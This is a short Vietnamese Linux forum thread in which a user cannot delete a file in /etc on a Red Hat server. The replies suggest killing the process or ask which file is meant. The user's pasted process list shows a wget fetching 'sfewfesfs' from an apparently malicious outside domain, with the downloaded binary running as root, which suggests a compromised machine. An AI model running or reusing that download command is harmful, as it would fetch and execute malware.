banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận hệ điều hành *nix Không xóa được file trong Linux  XML
  [Question]   Không xóa được file trong Linux 05/06/2014 09:42:50 (+0700) | #1 | 280762
V.I.C
Member

[Minus]    0    [Plus]
Joined: 25/10/2012 02:38:34
Messages: 12
Offline
[Profile] [PM]
Em gặp phải 1 vấn đề khi xóa file trên Redhat như sau:
[root@sapsol etc]# rm -rf sfewfesfs
rm: cannot remove `sfewfesfs': Operation not permitted
sau đó em đã thử thêm cách:
[root@sapsol etc]# lsattr password
[root@sapsol etc]# chattr -ai password
Mà vẫn không xóa được file đó
Process nó vẫn chạy : ps -aux | grep sfewfesfsh
root 3665 3555 0 08:00 ? 00:00:00 wget http://www.dgnfd564sdf.com:8080/sfewfesfs
root 3734 1 0 08:00 ? 00:00:00 /etc/sfewfesfsh
root 14284 7426 0 08:24 pts/2 00:00:00 grep sfewfesfs

Các anh đề xuất cao kiến giúp em ?
Em cảm ơn.
[Up] [Print Copy]
  [Question]   Không xóa được file trong Linux 06/06/2014 19:01:36 (+0700) | #2 | 280774
[Avatar]
qwerty13
Member

[Minus]    0    [Plus]
Joined: 30/01/2013 06:37:58
Messages: 52
Offline
[Profile] [PM]
Kill process 3734 xong xoá có được không vậy?
Once Amser, forever Amser smilie
[Up] [Print Copy]
  [Question]   Không xóa được file trong Linux 14/06/2014 10:31:23 (+0700) | #3 | 280826
explorer88
Member

[Minus]    0    [Plus]
Joined: 06/11/2010 22:32:47
Messages: 75
Offline
[Profile] [PM]
file là sfewfesfs hay password ?
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|